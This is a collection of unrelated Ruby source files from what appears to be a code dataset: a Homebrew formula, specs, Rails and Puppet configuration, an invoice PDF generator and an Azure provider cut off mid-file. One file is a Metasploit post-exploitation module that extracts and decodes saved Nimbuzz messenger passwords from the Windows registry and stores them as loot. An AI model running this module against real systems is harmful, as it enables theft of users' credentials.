    hosts:
      "127.0.0.1.xip.io:8080":
        paths:
          /:
            file.dir: #{var}/h2o/
  EOS
end
# Post-install message pointing the user at the installed example config.
def caveats
  <<~EOS
    A basic example configuration file has been placed in #{etc}/h2o.
    You can find fuller, unmodified examples here:
      https://github.com/h2o/h2o/tree/master/examples/h2o
  EOS
end
plist_options :manual => "h2o"

# launchd property list: keep h2o running (KeepAlive) with the brewed config.
def plist
  <<~EOS
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
      <key>Label</key>
      <string>#{plist_name}</string>
      <key>RunAtLoad</key>
      <true/>
      <key>KeepAlive</key>
      <true/>
      <key>ProgramArguments</key>
      <array>
        <string>#{opt_bin}/h2o</string>
        <string>-c</string>
        <string>#{etc}/h2o/h2o.conf</string>
      </array>
    </dict>
    </plist>
  EOS
end
# Smoke test: boot h2o with the example config, curl the served index page,
# then shut the server down regardless of the outcome.
test do
pid = fork do
exec "#{bin}/h2o -c #{etc}/h2o/h2o.conf"
end
# Give the server a moment to bind the port before curling it.
sleep 2
begin
assert_match "Welcome to H2O", shell_output("curl localhost:8080")
ensure
Process.kill("SIGINT", pid)
Process.wait(pid)
end
end
end
| 28.266667 | 106 | 0.644879 |
4a6c4cc9676fe97621bb37888bd5ca37a811f023 | 276 | require 'spec_helper'
# Rack-level specs for App: the root route responds 200 and persists
# one Request record per hit.
RSpec.describe App do
it 'returns http success' do
get '/'
expect(last_response).to be_ok
end
it 'creates a request record' do
expect {
get '/'
}.to change(Request, :count).by(1)
expect(Request.count).to eq(1)
end
end
| 17.25 | 38 | 0.637681 |
4a0123b33744294883b60c94e76f7c3ef3a00222 | 144 | class AddStakingToPaymentTransactions < ActiveRecord::Migration
# Adds a nullable :staking boolean to payment_transactions.
# NOTE(review): no default/null constraint -- existing rows get NULL;
# confirm callers treat NULL as false.
def change
add_column :payment_transactions, :staking, :boolean
end
end
| 24 | 63 | 0.805556 |
6ae38b02d8263bf5c7cdd321138c0e88a7f28505 | 777 | Facter.add(:passalgo) do
confine :osfamily => "RedHat"
setcode do
# Ask authconfig which password hashing algorithm is configured and map
# the reported name onto this fact's canonical values.
algo = Facter::Core::Execution.exec("authconfig --test | grep hashing | awk '{print $5}'")
case algo
when /md5/
'md5'
when /sha256/
'sha256'
when /sha512/
'sha512'
# Both legacy DES variants are reported as plain 'crypt'.
when /descrypt/
'crypt'
when /bigcrypt/
'crypt'
else
'unknown'
end
end
end
# Solaris variant: read CRYPT_DEFAULT from /etc/security/policy.conf and map
# the crypt(3c) module identifier onto the fact's canonical algorithm names.
Facter.add(:passalgo) do
  confine :osfamily => "Solaris"
  setcode do
    matches = File.read('/etc/security/policy.conf').scan(/^CRYPT_DEFAULT=(.+)/)
    # Bug fix: when CRYPT_DEFAULT is absent, scan returns [] and the old
    # `matches[0][0]` raised NoMethodError on nil; dig degrades to nil,
    # which to_s turns into "" and the case falls through to 'unknown'.
    case matches.dig(0, 0).to_s
    when /1/
      'md5'
    when /2a/
      'blowfish'
    when /md5/
      'sunmd5'
    when /5/
      'sha256'
    when /6/
      'sha512'
    when /unix/
      'crypt'
    else
      'unknown'
    end
  end
end
| 17.659091 | 94 | 0.537967 |
0380d7e554863161558244363d5e17131ad8bcae | 1,117 | shared_context :common_context do
# Shared fixtures for D2L Valence specs: app credentials come from the
# environment, contexts/tokens are built lazily via let.
let(:app_id) { ENV['D2L_API_ID'] }
let(:app_key) { ENV['D2L_API_KEY'] }
let(:auth_host) { D2L::Valence::Host.new(scheme: :https, host: 'partners.brightspace.com') }
let(:api_version) { '1.0'}
let(:app_context) do
D2L::Valence::AppContext.new(
brightspace_host: auth_host,
app_id: app_id,
app_key: app_key,
api_version: api_version
)
end
# Names of the auth query-string parameters expected on signed requests.
let(:auth_token_parameters) do
[
D2L::Valence::AuthTokens::APP_ID_PARAM,
D2L::Valence::AuthTokens::SIGNATURE_BY_APP_KEY_PARAM,
D2L::Valence::AuthTokens::USER_ID_PARAM,
D2L::Valence::AuthTokens::SIGNATURE_BY_USER_KEY_PARAM,
D2L::Valence::AuthTokens::TIMESTAMP_PARAM
]
end
let(:callback_uri) { URI('https://apitesttool.desire2learnvalence.com/index.php') }
let(:auth_key) { D2L::Valence::Encrypt.generate_from(app_key, callback_uri.to_s) }
let(:user_context) do
D2L::Valence::UserContext.new(
app_context: app_context,
user_id: user_id,
user_key: user_key
)
end
# Static sample user credentials used by the API test tool.
let(:user_id) { '3' }
let(:user_key) { 'Vi9NYNbK-l3L' }
end
61ee3a02e886cc5472c96effde3ff3d0a1a917f6 | 2,172 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/auxiliary/report'
# Post-exploitation module: walks HKU registry hives on the target, extracts
# Nimbuzz IM credentials, decodes the stored password and saves it as loot.
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info( info,
'Name' => 'Windows Gather Nimbuzz Instant Messenger Password Extractor',
'Description' => %q{
This module extracts the account passwords saved by Nimbuzz Instant
Messenger in hex format.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',
'Unknown', # SecurityXploded Team, www.SecurityXploded.com
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
creds = Rex::Ui::Text::Table.new(
'Header' => 'Nimbuzz Instant Messenger Credentials',
'Indent' => 1,
'Columns' =>
[
'User',
'Password'
]
)
# Iterate per-user hives (SIDs), skipping the *_Classes subhives.
registry_enumkeys('HKU').each do |k|
next unless k.include? "S-1-5-21"
next if k.include? "_Classes"
vprint_status("Looking at Key #{k}")
subkeys = registry_enumkeys("HKU\\#{k}\\Software\\Nimbuzz\\")
# NOTE(review): this returns from the whole loop on the first user hive
# without Nimbuzz installed, skipping any later users -- confirm intended.
if subkeys == nil or subkeys == ""
print_status ("Nimbuzz Instant Messenger not installed for this user.")
return
end
user = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", "Username") || ""
hpass = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", "Password")
next if hpass == nil or hpass == ""
# Strip an 11-char prefix and trailing char, then hex-decode the rest.
hpass =~ /.{11}(.*)./
decpass = [$1].pack("H*")
print_good("User=#{user}, Password=#{decpass}")
creds << [user, decpass]
end
print_status("Storing data...")
path = store_loot(
'nimbuzz.user.creds',
'text/csv',
session,
creds.to_csv,
'nimbuzz_user_creds.csv',
'Nimbuzz User Credentials'
)
print_status("Nimbuzz user credentials saved in: #{path}")
end
end
| 27.493671 | 107 | 0.589779 |
5d26815d2495839b77c8e98e58250a35ad3075d3 | 1,976 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
# (Toggle via `rails dev:cache`, which creates/removes tmp/caching-dev.txt.)
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.seconds.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
# Application configuration
# Google Analytics property used in development (via configatron).
configatron.ga.tracking_id = 'UA-64301219-2'
end
| 34.068966 | 85 | 0.76164 |
e225b4587785c32aab037d4231a4f00a904709c8 | 711 | require_relative 'boot'
require 'rails'
require 'active_model/railtie'
require 'active_record/railtie'
require 'action_controller/railtie'
require './config/initializers/modules.rb'
Bundler.require(*Rails.groups)
# API-only Rails application: SQL schema format, UUID primary keys, and
# RSpec/FactoryBot generators with view/asset generation disabled.
module ExpertPalmTree
class Application < Rails::Application
config.load_defaults 6.0
config.api_only = true
# Custom per-environment settings from config/application.yml.
config.application = config_for(:application)
# structure.sql instead of schema.rb (needed for DB-specific features).
config.active_record.schema_format = :sql
config.generators do |g|
g.orm :active_record, primary_key_type: :uuid
g.test_framework :rspec, views: false
g.fixture_replacement :factory_bot, dir: 'spec/factories'
g.assets = false
g.view_specs = false
g.helper = false
end
end
end
| 26.333333 | 63 | 0.732771 |
3979258cdf1ca2af15c4278db81a67675c69e8da | 3,027 | require 'prawn/core'
require 'prawn/format'
require "prawn/measurement_extensions"
require 'gruff'
require "open-uri"
module Pdf
module Finance
# Renders an invoice PDF with Prawn from an InvoiceReportData-like object.
# Layout is built top-to-bottom, so the order of the print_* calls matters.
class InvoiceGenerator
include Pdf::Printer
# TODO: remove
include ActionView::Helpers::NumberHelper
include ThreeScale::MoneyHelper
include ::Finance::InvoicesHelper
# @param invoice_data [#name, #buyer, #provider, #line_items, ...] report data
def initialize(invoice_data)
@data = invoice_data
# Decodes HTML entities in money strings before rendering (see print_total).
@coder = HTMLEntities.new
# TODO: accept as parameter
@style = Pdf::Styles::BlackAndWhite.new
@pdf = Prawn::Document.new(:page_size => 'A4',
:page_layout => :portrait)
@pdf.tags(@style.tags)
@pdf.font(@style.font)
end
# Generates PDF content and wraps it to envelope acceptable by Paperclip
def generate_as_attachment
InvoiceAttachment.new(@data, generate)
end
# Lays out the whole invoice and returns the rendered PDF as a string.
def generate
# Header row: provider logo on the left, buyer address on the right.
two_columns do |column|
case column
when :left
@pdf.image(@data.logo, :fit => [200,50], :position => :left) if @data.has_logo?
when :right
print_address(@data.buyer)
end
end
move_down(14)
@pdf.text "Invoice for #{@data.name}", :size => 20, :align => :center
move_down(14)
subtitle('<b>Details</b>')
print_details
move_down(3)
# TODO: cleanup the constants
two_columns( [ 0.mm, @pdf.cursor ], :height => 50.mm) do |column|
case column
when :left then print_address( @data.provider, 'Issued by')
when :right then print_address( @data.buyer, 'For')
end
end
move_down(5)
print_line_items
move_down(5)
print_line
move_down
print_total
move_down(2)
@pdf.text @data.invoice_footnote
move_down
@pdf.render
end
private
# Renders an address table (optionally titled) in the current half column.
def print_address(person, name = nil)
subtitle("<b>#{name}</b>") if name
@pdf.table(person, @style.table_style.merge(:width => TABLE_HALF_WIDTH))
end
# Invoice metadata table: id, issue date, billing period and due date.
def print_details
details = [ [ 'Invoice ID', @data.friendly_id ],
[ 'Issued on', @data.issued_on ],
[ 'Billing period start', @data.period_start ],
[ 'Billing period end', @data.period_end ],
[ 'Due on', @data.due_on ] ]
@pdf.table(details, @style.table_style)
end
# Full-width table of line items, plus the zero-VAT note when applicable.
def print_line_items
opts = { :width => TABLE_FULL_WIDTH, :headers => InvoiceReportData::LINE_ITEMS_HEADING }
@pdf.table(@data.line_items, @style.table_style.merge(opts))
move_down
@pdf.text(@data.vat_zero_text) if @data.vat_rate == 0
end
# Right-aligned total amount due.
def print_total
@pdf.bounding_box([@pdf.bounds.right - 310, @pdf.cursor], :width => 310) do
@pdf.text "<b>AMOUNT DUE: #{@coder.decode(rounded_price_tag(@data.cost))}</b>", :size => 13, :align => :right
end
end
end
end
end
| 27.518182 | 119 | 0.570862 |
acefca8427bf20489198ec3d54a5778c228a778e | 922 | $LOAD_PATH.unshift File.dirname(__FILE__)
require 'helper'
# Tests for `hub alias`: with no shell it lists instructions for every
# supported shell; with a shell it prints that shell's alias command.
# `hub` and `assert_alias_command` come from the test helper.
class AliasTest < Test::Unit::TestCase
def test_alias
instructions = hub("alias")
assert_includes "bash", instructions
assert_includes "sh", instructions
assert_includes "csh", instructions
assert_includes "zsh", instructions
assert_includes "fish", instructions
end
def test_alias_silent
assert_equal "alias git=hub\n", hub("alias -s bash")
end
def test_alias_bash
assert_alias_command "bash", "alias git=hub"
end
def test_alias_sh
assert_alias_command "sh", "alias git=hub"
end
def test_alias_zsh
assert_alias_command "zsh", "alias git=hub"
end
# csh-family shells use space-separated alias syntax.
def test_alias_csh
assert_alias_command "csh", "alias git hub"
end
def test_alias_fish
assert_alias_command "fish", "alias git hub"
end
# Unknown shells produce a fatal error.
def test_alias_blah
assert_alias_command "blah", "fatal: never heard of `blah'"
end
end
| 21.952381 | 63 | 0.722343 |
1cdecdff2b2361980e049f88735e7e6d7b940c32 | 407 | require "vagrant"
module VagrantPlugins
module GuestSolaris
# Vagrant 1.x plugin registering Solaris guest support; the config and
# guest classes are required lazily when first requested.
class Plugin < Vagrant.plugin("1")
name "Solaris guest."
description "Solaris guest support."
config("solaris") do
require File.expand_path("../config", __FILE__)
Config
end
guest("solaris") do
require File.expand_path("../guest", __FILE__)
Guest
end
end
end
end
| 19.380952 | 55 | 0.611794 |
f742edc5915a2f35f6cd23e1eb28d1c724bf682a | 23,330 | # require "pry"
# require "pry-rescue"
require "json"
Puppet::Type.type(:azure_ddos_protection_plan).provide(:arm) do
mk_resource_methods
# Sets up provider state: @property_flush collects pending property changes;
# the create/delete flags let #flush skip work already done.
def initialize(value = {})
super(value)
@property_flush = {}
@is_create = false
@is_delete = false
end
# Property setters: Puppet calls one of these when the desired value differs
# from the discovered value; the change is recorded in @property_flush and
# applied later by #flush.
def etag=(value)
Puppet.info("etag setter called to change to #{value}")
@property_flush[:etag] = value
end
def id=(value)
Puppet.info("id setter called to change to #{value}")
@property_flush[:id] = value
end
def location=(value)
Puppet.info("location setter called to change to #{value}")
@property_flush[:location] = value
end
def name=(value)
Puppet.info("name setter called to change to #{value}")
@property_flush[:name] = value
end
def properties=(value)
Puppet.info("properties setter called to change to #{value}")
@property_flush[:properties] = value
end
def tags=(value)
Puppet.info("tags setter called to change to #{value}")
@property_flush[:tags] = value
end
def type=(value)
Puppet.info("type setter called to change to #{value}")
@property_flush[:type] = value
end
# Puppet discovery hook: all existing DDoS protection plans as providers.
def self.instances
fetch_all_as_hash
end
# Pairs each managed resource with its discovered provider by
# case-insensitive name match.
def self.prefetch(resources)
instances.each do |prov|
if (resource = (resources.find { |k, v| k.casecmp(prov.name).zero? } || [])[1])
resource.provider = prov
end
end
end
# Converts the raw API list into provider instances, mapping wire field
# names to Puppet attribute symbols and stripping server-managed fields
# (etag, id, provisioningState, ...) so they never show up as diffs.
def self.fetch_all_as_hash
items = self.fetch_all
if items
items.collect do |item|
hash = {
api_version: item["api-version"],
etag: item["etag"],
id: item["id"],
location: item["location"],
name: item["name"],
parameters: item["parameters"],
properties: item["properties"],
resource_group_name: item["resourceGroupName"],
subscription_id: item["subscriptionId"],
tags: item["tags"],
type: item["type"],
ensure: :present,
}
self.deep_delete(hash, [:etag])
self.deep_delete(hash, [:id])
self.deep_delete(hash, [:properties, "provisioningState"])
self.deep_delete(hash, [:properties, "resourceGuid"])
self.deep_delete(hash, [:properties, "virtualNetworks"])
self.deep_delete(hash, [:type])
Puppet.debug("Adding to collection: #{item}")
new(hash) if hash
end.compact
else
[]
end
rescue Exception => ex
Puppet.alert("ex is #{ex} and backtrace is #{ex.backtrace}")
raise
end
# Recursively removes the value addressed by +tokens+ (a path of hash keys)
# from +hash_item+, descending into arrays element-wise at every level.
# Missing intermediate keys are left untouched. Mutates and returns
# +hash_item+ (which may be nil).
def self.deep_delete(hash_item, tokens)
  # Guard once up front instead of repeating `unless hash_item.nil? or ...`.
  return hash_item if hash_item.nil?
  if tokens.size == 1
    if hash_item.is_a?(Array)
      hash_item.map! { |item| deep_delete(item, tokens) }
    else
      hash_item.delete(tokens[0]) unless hash_item[tokens[0]].nil?
    end
  else
    if hash_item.is_a?(Array)
      hash_item.map! { |item| deep_delete(item, tokens[1..-1]) }
    else
      hash_item[tokens.first] = deep_delete(hash_item[tokens.first], tokens[1..-1]) unless hash_item[tokens[0]].nil?
    end
  end
  hash_item
end
# Lists all DDoS protection plans via the REST API and returns the parsed
# "value" array, or nil when the call fails or the payload is unexpected.
def self.fetch_all
  response = invoke_list_all
  return unless response.is_a?(Net::HTTPSuccess)
  parsed = JSON.parse(response.body)
  parsed["value"] if parsed.is_a?(Hash) && parsed.key?("value")
end
# Serializes a provider instance into the Puppet property hash, converting
# any attribute that offers a Hash representation via #to_hash.
def self.instance_to_hash(instance)
  # Prefer the Hash form of a value when one is available.
  unwrap = ->(value) { value.respond_to?(:to_hash) ? value.to_hash : value }
  {
    ensure: :present,
    api_version: unwrap.call(instance.api_version),
    etag: unwrap.call(instance.etag),
    id: unwrap.call(instance.id),
    location: unwrap.call(instance.location),
    name: unwrap.call(instance.name),
    parameters: unwrap.call(instance.parameters),
    properties: unwrap.call(instance.properties),
    resource_group_name: unwrap.call(instance.resource_group_name),
    subscription_id: unwrap.call(instance.subscription_id),
    tags: unwrap.call(instance.tags),
    type: unwrap.call(instance.type),
    object: instance,
  }
end
# Creates the DDoS protection plan via a PUT call; marks the resource
# present on success and raises on any non-2xx response.
def create
@is_create = true
Puppet.info("Entered create for resource #{name} of type DdosProtectionPlan")
hash = build_hash
response = self.class.invoke_create(resource, hash)
if response.is_a? Net::HTTPSuccess
@property_hash[:ensure] = :present
Puppet.info("Added :ensure to property hash")
else
raise Puppet::Error, "Create failed. Response is #{response} and body is #{response.body}"
end
rescue Exception => ex
Puppet.alert("Exception during create. The state of the resource is unknown. ex is #{ex} and backtrace is #{ex.backtrace}")
raise
end
# Applies accumulated property changes with a PUT; no-op when the resource
# was already created or deleted during this run.
def flush
Puppet.info("Entered flush for resource #{name} of type DdosProtectionPlan - creating ? #{@is_create}, deleting ? #{@is_delete}")
if @is_create || @is_delete
return # we've already done the create or delete
end
hash = build_hash
response = self.class.invoke_update(resource, hash)
if response.is_a? Net::HTTPSuccess
@property_hash[:ensure] = :present
Puppet.info("Added :ensure to property hash")
else
raise Puppet::Error, "Flush failed. The state of the resource is unknown. Response is #{response} and body is #{response.body}"
end
rescue Exception => ex
Puppet.alert("Exception during flush. ex is #{ex} and backtrace is #{ex.backtrace}")
raise
end
# Builds the REST request body from the Puppet resource, copying only the
# supported fields that are actually set.
def build_hash
  ddos_protection_plan = {}
  %i[etag id location name properties tags type].each do |field|
    value = resource[field]
    ddos_protection_plan[field.to_s] = value unless value.nil?
  end
  ddos_protection_plan
end
# Default request parameters shared by every operation (the API version).
def self.build_key_values
  { "api-version" => "2018-11-01" }
end
# Puppet ensure => absent entry point.
def destroy
delete(resource)
end
# Issues the DELETE call; raises on any non-2xx response.
# NOTE(review): on success this sets :ensure to :present (and logs
# "Added :absent") -- looks like it should be :absent; confirm.
def delete(hash)
Puppet.info("Entered delete for resource #{hash[:name]} of type <no value>")
@is_delete = true
response = self.class.invoke_delete(hash)
if response.is_a? Net::HTTPSuccess
@property_hash[:ensure] = :present
Puppet.info "Added :absent to property_hash"
else
raise Puppet::Error, "Delete failed. The state of the resource is unknown. Response is #{response} and body is #{response.body}"
end
rescue Exception => ex
Puppet.alert("Exception during destroy. ex is #{ex} and backtrace is #{ex.backtrace}")
raise
end
# GET all plans in the subscription. Each op_param descriptor routes a value
# into the query string or URL path; values are resolved in increasing
# precedence from built-in defaults, azure_* env vars, then the resource.
def self.invoke_list_all(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_List")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/providers/Microsoft.Network/ddosProtectionPlans", "Get", "[application/json]")
end
# PUT create-or-update for a single plan. Same parameter-routing scheme as
# invoke_list_all; identical to invoke_update (the API is idempotent PUT).
def self.invoke_create(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_CreateOrUpdate")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("ddosProtectionPlanName", "path", "name", "ddos_protection_plan_name"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("parameters", "body", "parameters", "parameters"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("resourceGroupName", "path", "resource_group_name", "resource_group_name"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/resourceGroups/%{resource_group_name}/providers/Microsoft.Network/ddosProtectionPlans/%{ddos_protection_plan_name}", "Put", "[application/json]")
end
# PUT update for a single plan -- duplicate of invoke_create, kept because
# the provider's create/flush paths call them separately.
def self.invoke_update(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_CreateOrUpdate")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("ddosProtectionPlanName", "path", "name", "ddos_protection_plan_name"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("parameters", "body", "parameters", "parameters"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("resourceGroupName", "path", "resource_group_name", "resource_group_name"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/resourceGroups/%{resource_group_name}/providers/Microsoft.Network/ddosProtectionPlans/%{ddos_protection_plan_name}", "Put", "[application/json]")
end
# DELETE for a single plan; same parameter-routing scheme as the other
# invoke_* operations.
def self.invoke_delete(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_Delete")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("ddosProtectionPlanName", "path", "name", "ddos_protection_plan_name"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("resourceGroupName", "path", "resource_group_name", "resource_group_name"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/resourceGroups/%{resource_group_name}/providers/Microsoft.Network/ddosProtectionPlans/%{ddos_protection_plan_name}", "Delete", "[application/json]")
end
def self.invoke_list_with_params(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_List")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/providers/Microsoft.Network/ddosProtectionPlans", "Get", "[application/json]")
end
def self.invoke_get_one(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_Get")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("ddosProtectionPlanName", "path", "name", "ddos_protection_plan_name"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("resourceGroupName", "path", "resource_group_name", "resource_group_name"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/resourceGroups/%{resource_group_name}/providers/Microsoft.Network/ddosProtectionPlans/%{ddos_protection_plan_name}", "Get", "[application/json]")
